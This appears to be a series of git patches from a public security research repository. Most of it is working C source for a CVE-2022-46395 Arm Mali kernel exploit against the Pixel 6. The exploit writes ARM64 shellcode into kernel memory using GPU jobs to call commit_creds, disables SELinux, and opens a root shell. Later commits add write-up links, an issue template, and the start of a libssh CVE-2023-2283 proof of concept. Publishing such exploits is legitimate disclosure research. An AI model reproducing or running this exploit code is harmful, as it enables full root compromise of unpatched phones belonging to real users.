+ if (pg != -1) {
+ LOG("found pgd at page %d\n", pg);
+ } else {
+ LOG("failed to find pgd, retry\n");
+ success = 0;
+ need_reset_fd = 1;
+ close(mali_fd);
+ return 0;
+ }
+ uint64_t pgd = alias_region + pg * 0x1000;
+ atom_number = write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
+ run_enforce();
+ cleanup(mali_fd, pgd, atom_number++);
+ return 1;
+ }
+ close(mali_fd);
+ return 0;
+}
+
+int reset_mali2(int prev) {
+ if (prev != -1) close(prev);
+ int mali_fd2 = open_dev(MALI);
+ setup_mali(mali_fd2, 1);
+ void* tracking_page2 = setup_tracking_page(mali_fd2);
+ reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ return mali_fd2;
+}
+
+int main() {
+ setbuf(stdout, NULL);
+ setbuf(stderr, NULL);
+ uint64_t counter = 0;
+ select_offset();
+ int mali_fd2 = reset_mali2(-1);
+ benchmark_time = benchmark();
+ while (!success) {
+ reset();
+ int ret = trigger(mali_fd2);
+ counter++;
+ if (counter % 100 == 0) {
+ LOG("failed after %ld\n", counter);
+ }
+ if (counter % 300 == 0) {
+ benchmark_time = benchmark();
+ }
+ if (!success && need_reset_fd) {
+ mali_fd2 = reset_mali2(mali_fd2);
+ }
+ if (ret == 1) system("sh");
+ }
+ LOG("success after %ld\n", counter);
+}
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.c b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.c
new file mode 100644
index 0000000..c696832
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.c
@@ -0,0 +1,160 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include "stdbool.h"
+#include
+#include
+
+#include "mem_write.h"
+#include "mempool_utils.h"
+
+#define ADRP_INIT_INDEX 0
+
+#define ADD_INIT_INDEX 1
+
+#define ADRP_COMMIT_INDEX 2
+
+#define ADD_COMMIT_INDEX 3
+
+void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
+ int prot = PROT_READ;
+ if (!read_only) {
+ alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
+ prot |= PROT_WRITE;
+ }
+ alloc.in.va_pages = va_pages;
+ alloc.in.commit_pages = commit_pages;
+ mem_alloc(mali_fd, &alloc);
+ void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
+ if (region == MAP_FAILED) {
+ err(1, "mmap failed");
+ }
+ return region;
+}
+
+static inline uint32_t lo32(uint64_t x) {
+ return x & 0xffffffff;
+}
+
+static inline uint32_t hi32(uint64_t x) {
+ return x >> 32;
+}
+
+static uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
+ uint64_t pc_page = pc >> 12;
+ uint64_t label_page = label >> 12;
+ int64_t offset = (label_page - pc_page) << 12;
+ int64_t immhi_mask = 0xffffe0;
+ int64_t immhi = offset >> 14;
+ int32_t immlo = (offset >> 12) & 0x3;
+ uint32_t adpr = rd & 0x1f;
+ adpr |= (1 << 28);
+ adpr |= (1 << 31); //op
+ adpr |= immlo << 29;
+ adpr |= (immhi_mask & (immhi << 5));
+ return adpr;
+}
+
+void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code) {
+
+ uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
+ //Sets x0 to init_cred
+ root_code[ADRP_INIT_INDEX] = init_adpr;
+ root_code[ADD_INIT_INDEX] = add_init;
+ //Sets x8 to commit_creds
+ root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
+ root_code[ADD_COMMIT_INDEX] = add_commit;
+ root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
+ root_code[5] = 0xd63f0100; // blr x8
+ root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
+ root_code[7] = 0xd65f03c0; // ret
+}
+
+static uint64_t set_addr_lv3(uint64_t addr) {
+ uint64_t pfn = addr >> PAGE_SHIFT;
+ pfn &= ~ 0x1FFUL;
+ pfn |= 0x100UL;
+ return pfn << PAGE_SHIFT;
+}
+
+static inline uint64_t compute_pt_index(uint64_t addr, int level) {
+ uint64_t vpfn = addr >> PAGE_SHIFT;
+ vpfn >>= (3 - level) * 9;
+ return vpfn & 0x1FF;
+}
+
+void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
+ void* jc_region = map_gpu(mali_fd, 1, 1, false, 0);
+ struct MALI_JOB_HEADER jh = {0};
+ jh.is_64b = true;
+ jh.type = MALI_JOB_TYPE_WRITE_VALUE;
+
+ struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
+ payload.type = type;
+ payload.immediate_value = value;
+ payload.address = gpu_addr;
+
+ MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh);
+ MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload);
+ uint32_t* section = (uint32_t*)jc_region;
+ struct base_jd_atom_v2 atom = {0};
+ atom.jc = (uint64_t)jc_region;
+ atom.atom_number = atom_number;
+ atom.core_req = BASE_JD_REQ_CS;
+ struct kbase_ioctl_job_submit submit = {0};
+ submit.addr = (uint64_t)(&atom);
+ submit.nr_atoms = 1;
+ submit.stride = sizeof(struct base_jd_atom_v2);
+ if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+ err(1, "submit job failed\n");
+ }
+ usleep(10000);
+}
+
+uint8_t write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, uint8_t atom_number) {
+ uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
+ uint64_t curr_overwrite_addr = 0;
+ for (int i = 0; i < size; i++) {
+ uint64_t base = reserved[i];
+ uint64_t end = reserved[i] + reserved_size * 0x1000;
+ uint64_t start_idx = compute_pt_index(base, 3);
+ uint64_t end_idx = compute_pt_index(end, 3);
+ for (uint64_t addr = base; addr < end; addr += 0x1000) {
+ uint64_t overwrite_addr = set_addr_lv3(addr);
+ if (curr_overwrite_addr != overwrite_addr) {
+ LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
+ curr_overwrite_addr = overwrite_addr;
+ for (int code = code_size - 1; code >= 0; code--) {
+ write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
+ }
+ usleep(300000);
+ }
+ }
+ }
+ return atom_number;
+}
+
+uint8_t cleanup(int mali_fd, uint64_t pgd, uint8_t atom_number) {
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+ return atom_number;
+}
+
+int run_enforce() {
+ char result = '2';
+ sleep(3);
+ int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
+ read(enforce_fd, &result, 1);
+ close(enforce_fd);
+ LOG("result %d\n", result);
+ return result;
+}
+
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h
new file mode 100644
index 0000000..17bc0c5
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h
@@ -0,0 +1,27 @@
+#ifndef MEM_WRITE_H
+#define MEM_WRITE_H
+
+#include
+#include "mali.h"
+#include "mali_base_jm_kernel.h"
+#include "midgard.h"
+#include "log_utils.h"
+
+#define KERNEL_BASE 0x80000000
+
+#define PAGE_SHIFT 12
+
+#define OVERWRITE_INDEX 256
+
+void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group);
+
+void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code);
+
+void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type);
+
+uint8_t write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, uint8_t atom_number);
+
+uint8_t cleanup(int mali_fd, uint64_t pgd, uint8_t atom_number);
+
+int run_enforce();
+#endif
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.c b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.c
new file mode 100644
index 0000000..9a7f134
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.c
@@ -0,0 +1,61 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include "stdbool.h"
+#include
+
+#include "mempool_utils.h"
+
+#define POOL_SIZE 16384
+
+void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) {
+ err(1, "mem_alloc failed\n");
+ }
+}
+
+void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+ for (int i = 0; i < nents; i++) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = pages;
+ alloc.in.commit_pages = pages;
+ mem_alloc(mali_fd, &alloc);
+ reserved_va[i] = alloc.out.gpu_va;
+ }
+}
+
+void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+ for (int i = 0; i < nents; i++) {
+ void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]);
+ if (reserved == MAP_FAILED) {
+ err(1, "mmap reserved failed %d\n", i);
+ }
+ reserved_va[i] = (uint64_t)reserved;
+ }
+}
+
+uint64_t drain_mem_pool(int mali_fd) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = POOL_SIZE;
+ alloc.in.commit_pages = POOL_SIZE;
+ mem_alloc(mali_fd, &alloc);
+ return alloc.out.gpu_va;
+}
+
+void release_mem_pool(int mali_fd, uint64_t drain) {
+ struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain};
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
+ err(1, "free_mem failed\n");
+ }
+}
+
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h
new file mode 100644
index 0000000..4115669
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h
@@ -0,0 +1,19 @@
+#ifndef MEMPOOL_UTILS_H
+#define MEMPOOL_UTILS_H
+
+#include
+#include "mali.h"
+#include "mali_base_jm_kernel.h"
+#include "log_utils.h"
+
+void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc);
+
+void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va);
+
+void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va);
+
+uint64_t drain_mem_pool(int mali_fd);
+
+void release_mem_pool(int mali_fd, uint64_t drain);
+
+#endif
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/midgard.h b/SecurityExploits/Android/Mali/CVE_2022_46395/midgard.h
new file mode 100644
index 0000000..e0ce432
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/midgard.h
@@ -0,0 +1,260 @@
+#ifndef MIDGARD_H
+#define MIDGARD_H
+
+//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define pan_section_ptr(base, A, S) \
+ ((void *)((uint8_t *)(base) + MALI_ ## A ## _SECTION_ ## S ## _OFFSET))
+
+#define pan_section_pack(dst, A, S, name) \
+ for (MALI_ ## A ## _SECTION_ ## S ## _TYPE name = { MALI_ ## A ## _SECTION_ ## S ## _header }, \
+ *_loop_terminate = (void *) (dst); \
+ __builtin_expect(_loop_terminate != NULL, 1); \
+ ({ MALI_ ## A ## _SECTION_ ## S ## _pack(pan_section_ptr(dst, A, S), &name); \
+ _loop_terminate = NULL; }))
+
+
+static inline uint64_t
+__gen_uint(uint64_t v, uint32_t start, uint32_t end)
+{
+#ifndef NDEBUG
+ const int width = end - start + 1;
+ if (width < 64) {
+ const uint64_t max = (1ull << width) - 1;
+ assert(v <= max);
+ }
+#endif
+
+ return v << start;
+}
+
+static inline uint64_t
+__gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end)
+{
+ uint64_t val = 0;
+ const int width = end - start + 1;
+ const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1 );
+
+ for (int byte = start / 8; byte <= end / 8; byte++) {
+ val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8);
+ }
+
+ return (val >> (start % 8)) & mask;
+}
+
+enum mali_job_type {
+ MALI_JOB_TYPE_NOT_STARTED = 0,
+ MALI_JOB_TYPE_NULL = 1,
+ MALI_JOB_TYPE_WRITE_VALUE = 2,
+ MALI_JOB_TYPE_CACHE_FLUSH = 3,
+ MALI_JOB_TYPE_COMPUTE = 4,
+ MALI_JOB_TYPE_VERTEX = 5,
+ MALI_JOB_TYPE_GEOMETRY = 6,
+ MALI_JOB_TYPE_TILER = 7,
+ MALI_JOB_TYPE_FUSED = 8,
+ MALI_JOB_TYPE_FRAGMENT = 9,
+};
+
+enum mali_write_value_type {
+ MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1,
+ MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2,
+ MALI_WRITE_VALUE_TYPE_ZERO = 3,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7,
+};
+
+
+struct MALI_WRITE_VALUE_JOB_PAYLOAD {
+ uint64_t address;
+ enum mali_write_value_type type;
+ uint64_t immediate_value;
+};
+
+struct MALI_JOB_HEADER {
+ uint32_t exception_status;
+ uint32_t first_incomplete_task;
+ uint64_t fault_pointer;
+ bool is_64b;
+ enum mali_job_type type;
+ bool barrier;
+ bool invalidate_cache;
+ bool suppress_prefetch;
+ bool enable_texture_mapper;
+ bool relax_dependency_1;
+ bool relax_dependency_2;
+ uint32_t index;
+ uint32_t dependency_1;
+ uint32_t dependency_2;
+ uint64_t next;
+};
+
+
+static inline void
+MALI_JOB_HEADER_pack(uint32_t * restrict cl,
+ const struct MALI_JOB_HEADER * restrict values)
+{
+ cl[ 0] = __gen_uint(values->exception_status, 0, 31);
+ cl[ 1] = __gen_uint(values->first_incomplete_task, 0, 31);
+ cl[ 2] = __gen_uint(values->fault_pointer, 0, 63);
+ cl[ 3] = __gen_uint(values->fault_pointer, 0, 63) >> 32;
+ cl[ 4] = __gen_uint(values->is_64b, 0, 0) |
+ __gen_uint(values->type, 1, 7) |
+ __gen_uint(values->barrier, 8, 8) |
+ __gen_uint(values->invalidate_cache, 9, 9) |
+ __gen_uint(values->suppress_prefetch, 11, 11) |
+ __gen_uint(values->enable_texture_mapper, 12, 12) |
+ __gen_uint(values->relax_dependency_1, 14, 14) |
+ __gen_uint(values->relax_dependency_2, 15, 15) |
+ __gen_uint(values->index, 16, 31);
+ cl[ 5] = __gen_uint(values->dependency_1, 0, 15) |
+ __gen_uint(values->dependency_2, 16, 31);
+ cl[ 6] = __gen_uint(values->next, 0, 63);
+ cl[ 7] = __gen_uint(values->next, 0, 63) >> 32;
+}
+
+
+#define MALI_JOB_HEADER_LENGTH 32
+struct mali_job_header_packed { uint32_t opaque[8]; };
+static inline void
+MALI_JOB_HEADER_unpack(const uint8_t * restrict cl,
+ struct MALI_JOB_HEADER * restrict values)
+{
+ if (((const uint32_t *) cl)[4] & 0x2400) fprintf(stderr, "XXX: Invalid field unpacked at word 4\n");
+ values->exception_status = __gen_unpack_uint(cl, 0, 31);
+ values->first_incomplete_task = __gen_unpack_uint(cl, 32, 63);
+ values->fault_pointer = __gen_unpack_uint(cl, 64, 127);
+ values->is_64b = __gen_unpack_uint(cl, 128, 128);
+ values->type = __gen_unpack_uint(cl, 129, 135);
+ values->barrier = __gen_unpack_uint(cl, 136, 136);
+ values->invalidate_cache = __gen_unpack_uint(cl, 137, 137);
+ values->suppress_prefetch = __gen_unpack_uint(cl, 139, 139);
+ values->enable_texture_mapper = __gen_unpack_uint(cl, 140, 140);
+ values->relax_dependency_1 = __gen_unpack_uint(cl, 142, 142);
+ values->relax_dependency_2 = __gen_unpack_uint(cl, 143, 143);
+ values->index = __gen_unpack_uint(cl, 144, 159);
+ values->dependency_1 = __gen_unpack_uint(cl, 160, 175);
+ values->dependency_2 = __gen_unpack_uint(cl, 176, 191);
+ values->next = __gen_unpack_uint(cl, 192, 255);
+}
+
+static inline const char *
+mali_job_type_as_str(enum mali_job_type imm)
+{
+ switch (imm) {
+ case MALI_JOB_TYPE_NOT_STARTED: return "Not started";
+ case MALI_JOB_TYPE_NULL: return "Null";
+ case MALI_JOB_TYPE_WRITE_VALUE: return "Write value";
+ case MALI_JOB_TYPE_CACHE_FLUSH: return "Cache flush";
+ case MALI_JOB_TYPE_COMPUTE: return "Compute";
+ case MALI_JOB_TYPE_VERTEX: return "Vertex";
+ case MALI_JOB_TYPE_GEOMETRY: return "Geometry";
+ case MALI_JOB_TYPE_TILER: return "Tiler";
+ case MALI_JOB_TYPE_FUSED: return "Fused";
+ case MALI_JOB_TYPE_FRAGMENT: return "Fragment";
+ default: return "XXX: INVALID";
+ }
+}
+
+static inline void
+MALI_JOB_HEADER_print(FILE *fp, const struct MALI_JOB_HEADER * values, unsigned indent)
+{
+ fprintf(fp, "%*sException Status: %u\n", indent, "", values->exception_status);
+ fprintf(fp, "%*sFirst Incomplete Task: %u\n", indent, "", values->first_incomplete_task);
+ fprintf(fp, "%*sFault Pointer: 0x%" PRIx64 "\n", indent, "", values->fault_pointer);
+ fprintf(fp, "%*sIs 64b: %s\n", indent, "", values->is_64b ? "true" : "false");
+ fprintf(fp, "%*sType: %s\n", indent, "", mali_job_type_as_str(values->type));
+ fprintf(fp, "%*sBarrier: %s\n", indent, "", values->barrier ? "true" : "false");
+ fprintf(fp, "%*sInvalidate Cache: %s\n", indent, "", values->invalidate_cache ? "true" : "false");
+ fprintf(fp, "%*sSuppress Prefetch: %s\n", indent, "", values->suppress_prefetch ? "true" : "false");
+ fprintf(fp, "%*sEnable Texture Mapper: %s\n", indent, "", values->enable_texture_mapper ? "true" : "false");
+ fprintf(fp, "%*sRelax Dependency 1: %s\n", indent, "", values->relax_dependency_1 ? "true" : "false");
+ fprintf(fp, "%*sRelax Dependency 2: %s\n", indent, "", values->relax_dependency_2 ? "true" : "false");
+ fprintf(fp, "%*sIndex: %u\n", indent, "", values->index);
+ fprintf(fp, "%*sDependency 1: %u\n", indent, "", values->dependency_1);
+ fprintf(fp, "%*sDependency 2: %u\n", indent, "", values->dependency_2);
+ fprintf(fp, "%*sNext: 0x%" PRIx64 "\n", indent, "", values->next);
+}
+
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_pack(uint32_t * restrict cl,
+ const struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
+{
+ cl[ 0] = __gen_uint(values->address, 0, 63);
+ cl[ 1] = __gen_uint(values->address, 0, 63) >> 32;
+ cl[ 2] = __gen_uint(values->type, 0, 31);
+ cl[ 3] = 0;
+ cl[ 4] = __gen_uint(values->immediate_value, 0, 63);
+ cl[ 5] = __gen_uint(values->immediate_value, 0, 63) >> 32;
+}
+
+
+#define MALI_WRITE_VALUE_JOB_PAYLOAD_LENGTH 24
+#define MALI_WRITE_VALUE_JOB_PAYLOAD_header 0
+
+
+struct mali_write_value_job_payload_packed { uint32_t opaque[6]; };
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_unpack(const uint8_t * restrict cl,
+ struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
+{
+ if (((const uint32_t *) cl)[3] & 0xffffffff) fprintf(stderr, "XXX: Invalid field unpacked at word 3\n");
+ values->address = __gen_unpack_uint(cl, 0, 63);
+ values->type = __gen_unpack_uint(cl, 64, 95);
+ values->immediate_value = __gen_unpack_uint(cl, 128, 191);
+}
+
+static inline const char *
+mali_write_value_type_as_str(enum mali_write_value_type imm)
+{
+ switch (imm) {
+ case MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER: return "Cycle Counter";
+ case MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP: return "System Timestamp";
+ case MALI_WRITE_VALUE_TYPE_ZERO: return "Zero";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_8: return "Immediate 8";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_16: return "Immediate 16";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_32: return "Immediate 32";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_64: return "Immediate 64";
+ default: return "XXX: INVALID";
+ }
+}
+
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_print(FILE *fp, const struct MALI_WRITE_VALUE_JOB_PAYLOAD * values, unsigned indent)
+{
+ fprintf(fp, "%*sAddress: 0x%" PRIx64 "\n", indent, "", values->address);
+ fprintf(fp, "%*sType: %s\n", indent, "", mali_write_value_type_as_str(values->type));
+ fprintf(fp, "%*sImmediate Value: 0x%" PRIx64 "\n", indent, "", values->immediate_value);
+}
+
+struct mali_write_value_job_packed {
+ uint32_t opaque[14];
+};
+
+#define MALI_JOB_HEADER_header \
+ .is_64b = true
+
+#define MALI_WRITE_VALUE_JOB_LENGTH 56
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_TYPE struct MALI_JOB_HEADER
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_header MALI_JOB_HEADER_header
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_pack MALI_JOB_HEADER_pack
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_unpack MALI_JOB_HEADER_unpack
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_print MALI_JOB_HEADER_print
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_OFFSET 0
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_TYPE struct MALI_WRITE_VALUE_JOB_PAYLOAD
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_header MALI_WRITE_VALUE_JOB_PAYLOAD_header
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_pack MALI_WRITE_VALUE_JOB_PAYLOAD_pack
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_unpack MALI_WRITE_VALUE_JOB_PAYLOAD_unpack
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_print MALI_WRITE_VALUE_JOB_PAYLOAD_print
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_OFFSET 32
+
+#endif
From ed8b1fd316916ded3d3643fc530584bdc43b6f07 Mon Sep 17 00:00:00 2001
From: Man Yue Mo
Date: Mon, 3 Apr 2023 08:34:48 +0100
Subject: [PATCH 10/53] Update link
---
SecurityExploits/Android/Mali/GHSL-2023-005/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/README.md b/SecurityExploits/Android/Mali/GHSL-2023-005/README.md
index 76a9978..44409ad 100644
--- a/SecurityExploits/Android/Mali/GHSL-2023-005/README.md
+++ b/SecurityExploits/Android/Mali/GHSL-2023-005/README.md
@@ -1,6 +1,6 @@
## Exploit for GHSL-2023-005
-The write up can be found [here](). A security patch from the upstream Arm Mali driver somehow got missed out in the update for the Pixel phones and I reported it to Google in January 2023. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
+The write up can be found [here](https://github.blog/2023-04-06-pwning-pixel-6-with-a-leftover-patch). A security patch from the upstream Arm Mali driver somehow got missed out in the update for the Pixel phones and I reported it to Google in January 2023. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
The exploit is tested on the Google Pixel 6 for devices running the January 2023 patch. For reference, I used the following command to compile it with clang in ndk-21:
From 63ba211eb8113bbed9694e68c3e0e85dc9f39104 Mon Sep 17 00:00:00 2001
From: Xavier RENE-CORAIL
Date: Sat, 15 Apr 2023 01:38:46 +0000
Subject: [PATCH 11/53] Create issue template for the wall of fame
---
.github/ISSUE_TEMPLATE/wall-of-fame.yml | 59 +++++++++++++++++++++++++
1 file changed, 59 insertions(+)
create mode 100644 .github/ISSUE_TEMPLATE/wall-of-fame.yml
diff --git a/.github/ISSUE_TEMPLATE/wall-of-fame.yml b/.github/ISSUE_TEMPLATE/wall-of-fame.yml
new file mode 100644
index 0000000..326a408
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/wall-of-fame.yml
@@ -0,0 +1,59 @@
+name: CodeQL Wall of Fame submission
+description: Propose an entry to the CodeQL Wall of Fame (https://securitylab.github.com/codeql-wall-of-fame)
+title: "[wall-of-fame]: "
+labels: [wall-of-fame]
+body:
+ - type: markdown
+ attributes:
+ value: |
+ # Welcome!
+
+ Thank you for submitting an entry for the CodeQL Wall of Fame!
+
+ # Details
+ - type: input
+ id: date
+ attributes:
+ label: Date
+ description: Publication date of the blog post, in YYYY-MM-DD format
+ placeholder: |
+ ex. 2023-01-01
+ validations:
+ required: true
+ - type: input
+ id: title
+ attributes:
+ label: Title
+ description: Title of the blog post
+ validations:
+ required: true
+ - type: input
+ id: author
+ attributes:
+ label: Author
+ description: Author of the blog post
+ validations:
+ required: true
+ - type: input
+ id: url
+ attributes:
+ label: URL
+ description: URL of the blog post
+ validations:
+ required: true
+ - type: input
+ id: cve
+ attributes:
+ label: CVE
+ description: CVE ID(s), comma separated
+ placeholder: |
+ ex. CVE-2023-0001, CVE-2023-0002
+ validations:
+ required: true
+ - type: textarea
+ id: description
+ attributes:
+ label: description
+ description: Short summary of the blog post
+ validations:
+ required: true
From fc8e70fbf6bb652e8526408c1dbeb12fefcc1367 Mon Sep 17 00:00:00 2001
From: Xavier RENE-CORAIL
Date: Mon, 17 Apr 2023 20:26:30 -0700
Subject: [PATCH 12/53] Typo - missing capitalization
---
.github/ISSUE_TEMPLATE/wall-of-fame.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.github/ISSUE_TEMPLATE/wall-of-fame.yml b/.github/ISSUE_TEMPLATE/wall-of-fame.yml
index 326a408..0489ed0 100644
--- a/.github/ISSUE_TEMPLATE/wall-of-fame.yml
+++ b/.github/ISSUE_TEMPLATE/wall-of-fame.yml
@@ -53,7 +53,7 @@ body:
- type: textarea
id: description
attributes:
- label: description
+ label: Description
description: Short summary of the blog post
validations:
required: true
From 319b5ad6a8b2305046a0646a91c63e58a08932f5 Mon Sep 17 00:00:00 2001
From: Man Yue Mo
Date: Wed, 24 May 2023 10:40:12 +0100
Subject: [PATCH 13/53] Add link
---
SecurityExploits/Android/Mali/CVE_2022_46395/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/README.md b/SecurityExploits/Android/Mali/CVE_2022_46395/README.md
index 6cafc1a..c16225f 100644
--- a/SecurityExploits/Android/Mali/CVE_2022_46395/README.md
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/README.md
@@ -1,6 +1,6 @@
## Exploit for CVE-2022-46395
-The write up can be found [here](). This is a bug in the Arm Mali kernel driver that I reported in November 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
+The write up can be found [here](https://github.blog/2023-05-25-rooting-with-root-cause-finding-a-variant-of-a-project-zero-bug). This is a bug in the Arm Mali kernel driver that I reported in November 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
The exploit is tested on the Google Pixel 6 with the Novmember 2022 and January 2023 patch. For reference, I used the following command to compile with clang in ndk-21:
From 79b4e6fa9729d1e61d839dd60d01eeabbc72d8f4 Mon Sep 17 00:00:00 2001
From: Kevin Backhouse
Date: Wed, 7 Jun 2023 12:38:20 +0100
Subject: [PATCH 14/53] PoC for libssh CVE-2023-2283
---
.../README.md | 104 +++++
.../attacker/Dockerfile | 35 ++
.../attacker/home/.bash_history | 1 +
.../attacker/home/.tmux.conf | 11 +
.../attacker/home/diff.txt | 399 ++++++++++++++++++
.../attacker/home/id_ed25519.pub | 1 +
.../attacker/home/id_rsa.pub | 1 +
.../server/Dockerfile | 35 ++
.../server/home/.bash_history | 5 +
.../server/home/.ssh/authorized_keys | 1 +
.../server/home/.ssh/id_ed25519.pub | 1 +
